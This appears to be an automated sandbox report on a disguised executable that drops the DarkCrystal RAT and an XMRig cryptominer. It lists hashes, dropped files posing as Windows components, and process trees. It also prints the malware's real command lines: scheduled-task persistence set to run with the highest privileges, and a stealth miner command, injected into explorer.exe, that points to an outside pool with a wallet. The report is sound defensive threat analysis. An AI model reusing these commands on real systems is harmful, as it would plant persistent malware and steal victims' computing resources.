Analysis
- max time kernel: 106s
- max time network: 109s
- platform: windows10_x64
- resource: win10v20210410
- submitted: 22-07-2021 22:41
Static task: static1
Behavioral task: behavioral1
Sample: Software v3.0.5.exe
Resource: win7v20210408
Errors
General
- Target: Software v3.0.5.exe
- Size: 910KB
- MD5: 56d73f0b8c89094a9f0ad6277f042b3d
- SHA1: 6efe8b8257f030fdb63a069aad558b6282310a31
- SHA256: c6c9d678a3313c5bb7fe71194a2a1e4d3ffca2f04252dd1983ba657cfe17320e
- SHA512: 6f003181b4118e421ec152f1297f7eb5f5e0b3276861c5ba8face20931aa75046dd95672f5120fc7f2acd65db69e0baaee0be7c3ed51a03ec3eab8b24c6a7379
Malware Config
Signatures
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Roaming\Dcr.exe | Dark_crystal_rat
C:\Users\Admin\AppData\Roaming\Dcr.exe | Dark_crystal_rat
-
DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
-
Processes:
resource | yara_rule
C:\Users\Admin\AppData\Roaming\Dcr.exe | dcrat
C:\Users\Admin\AppData\Roaming\Dcr.exe | dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe | dcrat
C:\fonthostSvc\fonthostSvcIntodhcp.exe | dcrat
C:\Program Files (x86)\Windows Sidebar\conhost.exe | dcrat
C:\Program Files (x86)\Windows Sidebar\conhost.exe | dcrat
-
XMRig Miner Payload 3 IoCs
Processes:
resource | yara_rule
behavioral2/memory/2712-198-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
behavioral2/memory/2712-199-0x00000001402EB66C-mapping.dmp | xmrig
behavioral2/memory/2712-201-0x0000000140000000-0x0000000140758000-memory.dmp | xmrig
-
Executes dropped EXE 9 IoCs
Processes:
pid | process
1440 | Dcr.exe
1584 | etc.exe
1852 | xmr.exe
1580 | fonthostSvcIntodhcp.exe
3172 | conhost.exe
2276 | services64.exe
2316 | services32.exe
2704 | sihost64.exe
2184 | sihost32.exe
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow | ioc
16 | ipinfo.io
17 | ipinfo.io
-
Drops file in System32 directory 4 IoCs
Processes:
description | ioc | process
File created | C:\Windows\System32\kbdfar\fontdrvhost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\kbdfar\5b884080fd4f94e2695da25c503f9e33b9605b83 | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\ws2_32\winlogon.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\System32\ws2_32\cc11b995f2a76da408ea6a601e682e64743153ad | fonthostSvcIntodhcp.exe
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
description | pid | process | target process
PID 2276 set thread context of 2712 | 2276 | services64.exe | explorer.exe
-
Drops file in Program Files directory 3 IoCs
Processes:
description | ioc | process
File created | C:\Program Files (x86)\Windows Sidebar\conhost.exe | fonthostSvcIntodhcp.exe
File created | C:\Program Files (x86)\Windows Sidebar\088424020bedd6b28ac7fd22ee35dcd7322895ce | fonthostSvcIntodhcp.exe
File created | C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\conhost.exe | fonthostSvcIntodhcp.exe
-
Drops file in Windows directory 5 IoCs
Processes:
description | ioc | process
File created | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\ShellExperienceHost.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\f8c8f1285d826bc63910aaf97db97186ba642b4f | fonthostSvcIntodhcp.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe | fonthostSvcIntodhcp.exe
File opened for modification | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe | fonthostSvcIntodhcp.exe
File created | C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\dab4d89cac03ec27dbe47b361df763dc3f848f6c | fonthostSvcIntodhcp.exe
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
pid | process
2692 | schtasks.exe
3520 | schtasks.exe
744 | schtasks.exe
1972 | schtasks.exe
1560 | schtasks.exe
2832 | schtasks.exe
1616 | schtasks.exe
400 | schtasks.exe
3520 | schtasks.exe
2004 | schtasks.exe
-
Modifies data under HKEY_USERS 15 IoCs
Processes:
description | ioc | process
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" | LogonUI.exe
Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" | LogonUI.exe
Set value (data) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" | LogonUI.exe
Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "1" | LogonUI.exe
-
Modifies registry class 1 IoCs
Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000_Classes\Local Settings | Dcr.exe
-
Suspicious behavior: EnumeratesProcesses 11 IoCs
Processes:
pid | process
1580 | fonthostSvcIntodhcp.exe
1580 | fonthostSvcIntodhcp.exe
1580 | fonthostSvcIntodhcp.exe
1580 | fonthostSvcIntodhcp.exe
1580 | fonthostSvcIntodhcp.exe
3172 | conhost.exe
3172 | conhost.exe
1584 | etc.exe
1852 | xmr.exe
2316 | services32.exe
2276 | services64.exe
-
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
description | pid | process
Token: SeDebugPrivilege | 1580 | fonthostSvcIntodhcp.exe
Token: SeDebugPrivilege | 3172 | conhost.exe
Token: SeDebugPrivilege | 1584 | etc.exe
Token: SeDebugPrivilege | 1852 | xmr.exe
Token: SeDebugPrivilege | 2316 | services32.exe
Token: SeDebugPrivilege | 2276 | services64.exe
Token: SeLockMemoryPrivilege | 2712 | explorer.exe
Token: SeLockMemoryPrivilege | 2712 | explorer.exe
-
Suspicious use of SetWindowsHookEx 2 IoCs
Processes:
pid | process
1560 | LogonUI.exe
1560 | LogonUI.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
description | pid | process | target process
PID 3256 wrote to memory of 1440 | 3256 | Software v3.0.5.exe | Dcr.exe
PID 3256 wrote to memory of 1440 | 3256 | Software v3.0.5.exe | Dcr.exe
PID 3256 wrote to memory of 1440 | 3256 | Software v3.0.5.exe | Dcr.exe
PID 3256 wrote to memory of 1584 | 3256 | Software v3.0.5.exe | etc.exe
PID 3256 wrote to memory of 1584 | 3256 | Software v3.0.5.exe | etc.exe
PID 3256 wrote to memory of 1852 | 3256 | Software v3.0.5.exe | xmr.exe
PID 3256 wrote to memory of 1852 | 3256 | Software v3.0.5.exe | xmr.exe
PID 1440 wrote to memory of 1884 | 1440 | Dcr.exe | WScript.exe
PID 1440 wrote to memory of 1884 | 1440 | Dcr.exe | WScript.exe
PID 1440 wrote to memory of 1884 | 1440 | Dcr.exe | WScript.exe
PID 1884 wrote to memory of 2876 | 1884 | WScript.exe | cmd.exe
PID 1884 wrote to memory of 2876 | 1884 | WScript.exe | cmd.exe
PID 1884 wrote to memory of 2876 | 1884 | WScript.exe | cmd.exe
PID 2876 wrote to memory of 1580 | 2876 | cmd.exe | fonthostSvcIntodhcp.exe
PID 2876 wrote to memory of 1580 | 2876 | cmd.exe | fonthostSvcIntodhcp.exe
PID 1580 wrote to memory of 2692 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 2692 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 2832 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 2832 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 1616 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 1616 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 3520 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 3520 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 744 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 744 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 1972 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 1972 | 1580 | fonthostSvcIntodhcp.exe | schtasks.exe
PID 1580 wrote to memory of 3172 | 1580 | fonthostSvcIntodhcp.exe | conhost.exe
PID 1580 wrote to memory of 3172 | 1580 | fonthostSvcIntodhcp.exe | conhost.exe
PID 1852 wrote to memory of 2544 | 1852 | xmr.exe | cmd.exe
PID 1852 wrote to memory of 2544 | 1852 | xmr.exe | cmd.exe
PID 1584 wrote to memory of 3372 | 1584 | etc.exe | cmd.exe
PID 1584 wrote to memory of 3372 | 1584 | etc.exe | cmd.exe
PID 2544 wrote to memory of 1560 | 2544 | cmd.exe | schtasks.exe
PID 2544 wrote to memory of 1560 | 2544 | cmd.exe | schtasks.exe
PID 3372 wrote to memory of 400 | 3372 | cmd.exe | schtasks.exe
PID 3372 wrote to memory of 400 | 3372 | cmd.exe | schtasks.exe
PID 1584 wrote to memory of 2316 | 1584 | etc.exe | services32.exe
PID 1584 wrote to memory of 2316 | 1584 | etc.exe | services32.exe
PID 1852 wrote to memory of 2276 | 1852 | xmr.exe | services64.exe
PID 1852 wrote to memory of 2276 | 1852 | xmr.exe | services64.exe
PID 2316 wrote to memory of 1844 | 2316 | services32.exe | cmd.exe
PID 2316 wrote to memory of 1844 | 2316 | services32.exe | cmd.exe
PID 2276 wrote to memory of 3028 | 2276 | services64.exe | cmd.exe
PID 2276 wrote to memory of 3028 | 2276 | services64.exe | cmd.exe
PID 2316 wrote to memory of 2184 | 2316 | services32.exe | sihost32.exe
PID 2316 wrote to memory of 2184 | 2316 | services32.exe | sihost32.exe
PID 2276 wrote to memory of 2704 | 2276 | services64.exe | sihost64.exe
PID 2276 wrote to memory of 2704 | 2276 | services64.exe | sihost64.exe
PID 3028 wrote to memory of 3520 | 3028 | cmd.exe | schtasks.exe
PID 3028 wrote to memory of 3520 | 3028 | cmd.exe | schtasks.exe
PID 1844 wrote to memory of 2004 | 1844 | cmd.exe | schtasks.exe
PID 1844 wrote to memory of 2004 | 1844 | cmd.exe | schtasks.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
PID 2276 wrote to memory of 2712 | 2276 | services64.exe | explorer.exe
Processes
- C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe (depth 1)
  command line: "C:\Users\Admin\AppData\Local\Temp\Software v3.0.5.exe"
  - Suspicious use of WriteProcessMemory
  - C:\Users\Admin\AppData\Roaming\Dcr.exe (depth 2)
    command line: C:\Users\Admin\AppData\Roaming\Dcr.exe
    - Executes dropped EXE
    - Modifies registry class
    - Suspicious use of WriteProcessMemory
    - C:\Windows\SysWOW64\WScript.exe (depth 3)
      command line: "C:\Windows\System32\WScript.exe" "C:\fonthostSvc\5R3FFGftzpp.vbe"
      - Suspicious use of WriteProcessMemory
      - C:\Windows\SysWOW64\cmd.exe (depth 4)
        command line: C:\Windows\system32\cmd.exe /c ""C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat" "
        - Suspicious use of WriteProcessMemory
        - C:\fonthostSvc\fonthostSvcIntodhcp.exe (depth 5)
          command line: "C:\fonthostSvc\fonthostSvcIntodhcp.exe"
          - Executes dropped EXE
          - Drops file in System32 directory
          - Drops file in Program Files directory
          - Drops file in Windows directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          - C:\Windows\SYSTEM32\schtasks.exe (depth 6)
            command line: "schtasks" /create /tn "SearchUI" /sc ONLOGON /tr "'C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.SmartExtraction\SearchUI.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          - C:\Windows\SYSTEM32\schtasks.exe (depth 6)
            command line: "schtasks" /create /tn "conhost" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Sidebar\conhost.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          - C:\Windows\SYSTEM32\schtasks.exe (depth 6)
            command line: "schtasks" /create /tn "fontdrvhost" /sc ONLOGON /tr "'C:\Windows\System32\kbdfar\fontdrvhost.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          - C:\Windows\SYSTEM32\schtasks.exe (depth 6)
            command line: "schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\AppxSignature\ShellExperienceHost.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          - C:\Windows\SYSTEM32\schtasks.exe (depth 6)
            command line: "schtasks" /create /tn "ShellExperienceHost" /sc ONLOGON /tr "'C:\PerfLogs\ShellExperienceHost.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          - C:\Windows\SYSTEM32\schtasks.exe (depth 6)
            command line: "schtasks" /create /tn "winlogon" /sc ONLOGON /tr "'C:\Windows\System32\ws2_32\winlogon.exe'" /rl HIGHEST /f
            - Creates scheduled task(s)
          - C:\Program Files (x86)\Windows Sidebar\conhost.exe (depth 6)
            command line: "C:\Program Files (x86)\Windows Sidebar\conhost.exe"
            - Executes dropped EXE
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
  - C:\Users\Admin\AppData\Roaming\etc.exe (depth 2)
    command line: C:\Users\Admin\AppData\Roaming\etc.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (depth 3)
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe (depth 4)
        command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
        - Creates scheduled task(s)
    - C:\Users\Admin\AppData\Roaming\services32.exe (depth 3)
      command line: "C:\Users\Admin\AppData\Roaming\services32.exe"
      - Executes dropped EXE
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe (depth 4)
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"' & exit
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe (depth 5)
          command line: schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Users\Admin\AppData\Roaming\services32.exe"'
          - Creates scheduled task(s)
      - C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe (depth 4)
        command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe"
        - Executes dropped EXE
  - C:\Users\Admin\AppData\Roaming\xmr.exe (depth 2)
    command line: C:\Users\Admin\AppData\Roaming\xmr.exe
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe (depth 3)
      command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      - Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe (depth 4)
        command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        - Creates scheduled task(s)
    - C:\Users\Admin\AppData\Roaming\services64.exe (depth 3)
      command line: "C:\Users\Admin\AppData\Roaming\services64.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - C:\Windows\System32\cmd.exe (depth 4)
        command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        - Suspicious use of WriteProcessMemory
        - C:\Windows\system32\schtasks.exe (depth 5)
          command line: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          - Creates scheduled task(s)
      - C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe (depth 4)
        command line: "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        - Executes dropped EXE
      - C:\Windows\explorer.exe (depth 4)
        command line: C:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.hashvault.pro:80 --user=459jfEXyVheN7bBBRJPjJY7jH8nCKFZKdZrBcyPK6q4b7mQnrxN3sSmU8wAcuVvMxP6sumE9x28XSRCgLgyBvT4VENVJbTQ --pass= --cpu-max-threads-hint=40 --cinit-idle-wait=3 --cinit-idle-cpu=80 --cinit-stealth
        - Suspicious use of AdjustPrivilegeToken
- C:\Windows\system32\LogonUI.exe (depth 1)
  command line: "LogonUI.exe" /flags:0x0 /state0:0xa3ade855 /state1:0x41c64e6d
  - Modifies data under HKEY_USERS
  - Suspicious use of SetWindowsHookEx
Downloads
- C:\Program Files (x86)\Windows Sidebar\conhost.exe
  MD5 8cf49d252229ed14a26b9a2b45771e1d
  SHA1 d53682e13e1f6a1a619c0d1780d86479d388bf0c
  SHA256 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
  SHA512 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
- C:\Users\Admin\AppData\Roaming\Dcr.exe
  MD5 975a0ad02701f9f528784dee5a9728d2
  SHA1 8a3b57da095dd6fc9d61fe004c1025d929370515
  SHA256 b0833db8843046dac1e15dd54871a77154fc7692395f216ab1966472ac87d19b
  SHA512 6d216c2d2cd0bcb427cedeb2c87045b4b346cd32481fed5008cdcea567067d357961958c255c7181ad291c129309f43afe4dc6c74416db8badf1fcc26f9b4503
- C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
  MD5 89c453dbd36f561195de8e5c5dce77a0
  SHA1 8cc44dd7646ec89b6c22214614a8cab158e47f0c
  SHA256 ef4ffc14eac837cb6c25996a57f6361a964b10514001ca80a87a4a9f68b5ed6d
  SHA512 c030af0901b2b8a72bdd8f2222c47e0d8bafdd6d27a6ddd569523c6f4fe8248d3d6e26c8ac5a201998d21dbc931e40d14b7a8ee254c7958d3ecf279efa79692c
- C:\Users\Admin\AppData\Roaming\Microsoft\Telemetry\sihost32.exe
  MD5 7059ba6625325156b764224d2b2dbd83
  SHA1 4cc34def0b7d39b913559f539e6d58a3e363f2e3
  SHA256 04c22c0e2f4f675e168a74f8320125d2c2e13f2c8d9bbfe237c95c116ca95608
  SHA512 ffda3be8b17404b2e3afadfeed9e28a26a67c9f5512a0422616dfc49ed43554f220a497702da6f773815c29f7a2cc71d6b462185002bba883679b55ffd0c4506
- C:\Users\Admin\AppData\Roaming\etc.exe
  MD5 b07420edcab9bae1bb3fe4befc7ee57c
  SHA1 41ae0d56b863d8155865548e8231e1994e197c21
  SHA256 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
  SHA512 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
- C:\Users\Admin\AppData\Roaming\services32.exe
  MD5 b07420edcab9bae1bb3fe4befc7ee57c
  SHA1 41ae0d56b863d8155865548e8231e1994e197c21
  SHA256 2ce38152ea33e195cd079f76d70f6e23f41d6c43d19de91655c9adfa15830639
  SHA512 584787ae1d2f6d1e78dcf96eeda801e0726760f19fddd1fbb2537c931feabd8ed3d1a6e2316a70b0afa5dd545af8b162bafc0e1cd427c7bd369307dc10dd1ce5
- C:\Users\Admin\AppData\Roaming\services64.exe
  MD5 f99c879d74bf1355905734a411191276
  SHA1 103a41ade035585e4834f7b939e15608fb64d201
  SHA256 eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
  SHA512 e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
- C:\Users\Admin\AppData\Roaming\xmr.exe
  MD5 f99c879d74bf1355905734a411191276
  SHA1 103a41ade035585e4834f7b939e15608fb64d201
  SHA256 eb6f4a94f35bd013416a6299174d1549a1299ef5373e07287dd3419ae7e0ddbe
  SHA512 e4995ca52ff89a1abb3819d3558557f0c948e65288f11ecd2289754bb754f08ee6fbbe02df5b3de1a6bb1b8d41022c7156e4a58d6a97a927cc9625fb173de2a4
- C:\fonthostSvc\5R3FFGftzpp.vbe
  MD5 cb60c41590dc32740e8923ba0cb6df97
  SHA1 aabc007b611df20e79fceee539ef63e7f2754304
  SHA256 c48aa50f0879775b7f0d878898cc662b8ea0412f401fb6c17be945ffd63cfda2
  SHA512 a42de214aef793c75cf1928c0734b65bd1817c4b36aae663c9119539ab8bec6b7e1881d8ad971a2fc4e8afe09958bc395928ce5e3eb393cb5b755e14e71264da
- C:\fonthostSvc\RJz6D4NNsdJ6mtrTpIKV9136D.bat
  MD5 7245c594f9448bae4a79764fb6897e25
  SHA1 1eb300765111494f6c7049b5abbbb0e5725b39aa
  SHA256 4fa6f4b4721eadae3ce004cefa98cfd8503e5f8dc0cc553d4db012a84c9eefa5
  SHA512 26c00c8a5e2cee0f8779cb9b9cec7efc1712c82c8db8fb0d3d3a7e997a8ccf1ebc0fef8b35cb129a111bdb3c224c111c77b347d50252bb601293a73dc30445c8
- C:\fonthostSvc\fonthostSvcIntodhcp.exe
  MD5 8cf49d252229ed14a26b9a2b45771e1d
  SHA1 d53682e13e1f6a1a619c0d1780d86479d388bf0c
  SHA256 45d61f970d204f85612572ba2257356bfc15e77187311049b30e9ef89da2752f
  SHA512 808f85a12bb8ebd9cb11e1e154d937c0bffc3a3781121cf96cc6150cd81cd8d8c6884c19bf73a910853a8b4a73f3bf879d6192158e78e9e4439844d82c0ece0a
- memory/400-163-0x0000000000000000-mapping.dmp
- memory/744-143-0x0000000000000000-mapping.dmp
- memory/1440-114-0x0000000000000000-mapping.dmp
- memory/1560-162-0x0000000000000000-mapping.dmp
- memory/1580-138-0x000000001BA00000-0x000000001BA02000-memory.dmp (Filesize 8KB)
- memory/1580-136-0x0000000000CC0000-0x0000000000CC1000-memory.dmp (Filesize 4KB)
- memory/1580-133-0x0000000000000000-mapping.dmp
- memory/1584-164-0x000000001D1C0000-0x000000001D1C2000-memory.dmp (Filesize 8KB)
- memory/1584-159-0x00000000019F0000-0x00000000019F1000-memory.dmp (Filesize 4KB)
- memory/1584-116-0x0000000000000000-mapping.dmp
- memory/1584-156-0x0000000001720000-0x0000000001726000-memory.dmp (Filesize 24KB)
- memory/1584-124-0x0000000000F20000-0x0000000000F21000-memory.dmp (Filesize 4KB)
- memory/1616-141-0x0000000000000000-mapping.dmp
- memory/1844-180-0x0000000000000000-mapping.dmp
- memory/1852-125-0x0000000000370000-0x0000000000371000-memory.dmp (Filesize 4KB)
- memory/1852-157-0x0000000000C70000-0x0000000000C79000-memory.dmp (Filesize 36KB)
- memory/1852-119-0x0000000000000000-mapping.dmp
- memory/1852-165-0x00000000011B0000-0x00000000011B2000-memory.dmp (Filesize 8KB)
- memory/1884-129-0x0000000000000000-mapping.dmp
- memory/1972-144-0x0000000000000000-mapping.dmp
- memory/2004-193-0x0000000000000000-mapping.dmp
- memory/2184-182-0x0000000000000000-mapping.dmp
- memory/2184-189-0x0000000000CB0000-0x0000000000CB1000-memory.dmp (Filesize 4KB)
- memory/2184-197-0x000000001C7C0000-0x000000001C7C2000-memory.dmp (Filesize 8KB)
- memory/2276-167-0x0000000000000000-mapping.dmp
- memory/2276-195-0x000000001C530000-0x000000001C532000-memory.dmp (Filesize 8KB)
- memory/2316-166-0x0000000000000000-mapping.dmp
- memory/2316-194-0x00000000016A0000-0x00000000016A2000-memory.dmp (Filesize 8KB)
- memory/2544-160-0x0000000000000000-mapping.dmp
- memory/2692-139-0x0000000000000000-mapping.dmp
- memory/2704-183-0x0000000000000000-mapping.dmp
- memory/2704-188-0x0000000000560000-0x0000000000561000-memory.dmp (Filesize 4KB)
- memory/2704-196-0x0000000000EB0000-0x0000000000EB2000-memory.dmp (Filesize 8KB)
- memory/2712-204-0x0000000000560000-0x0000000000580000-memory.dmp (Filesize 128KB)
- memory/2712-198-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize 7.3MB)
- memory/2712-199-0x00000001402EB66C-mapping.dmp
- memory/2712-200-0x0000000000510000-0x0000000000530000-memory.dmp (Filesize 128KB)
- memory/2712-201-0x0000000140000000-0x0000000140758000-memory.dmp (Filesize 7.3MB)
- memory/2832-140-0x0000000000000000-mapping.dmp
- memory/2876-132-0x0000000000000000-mapping.dmp
- memory/3028-181-0x0000000000000000-mapping.dmp
- memory/3172-145-0x0000000000000000-mapping.dmp
- memory/3172-150-0x000000001B1F0000-0x000000001B1F2000-memory.dmp (Filesize 8KB)
- memory/3172-151-0x0000000000A80000-0x0000000000A85000-memory.dmp (Filesize 20KB)
- memory/3172-152-0x0000000000B30000-0x0000000000B32000-memory.dmp (Filesize 8KB)
- memory/3172-153-0x0000000000AC0000-0x0000000000AC2000-memory.dmp (Filesize 8KB)
- memory/3172-154-0x000000001C2D0000-0x000000001C2D1000-memory.dmp (Filesize 4KB)
- memory/3172-155-0x000000001D880000-0x000000001D881000-memory.dmp (Filesize 4KB)
- memory/3372-161-0x0000000000000000-mapping.dmp
- memory/3520-192-0x0000000000000000-mapping.dmp
- memory/3520-142-0x0000000000000000-mapping.dmp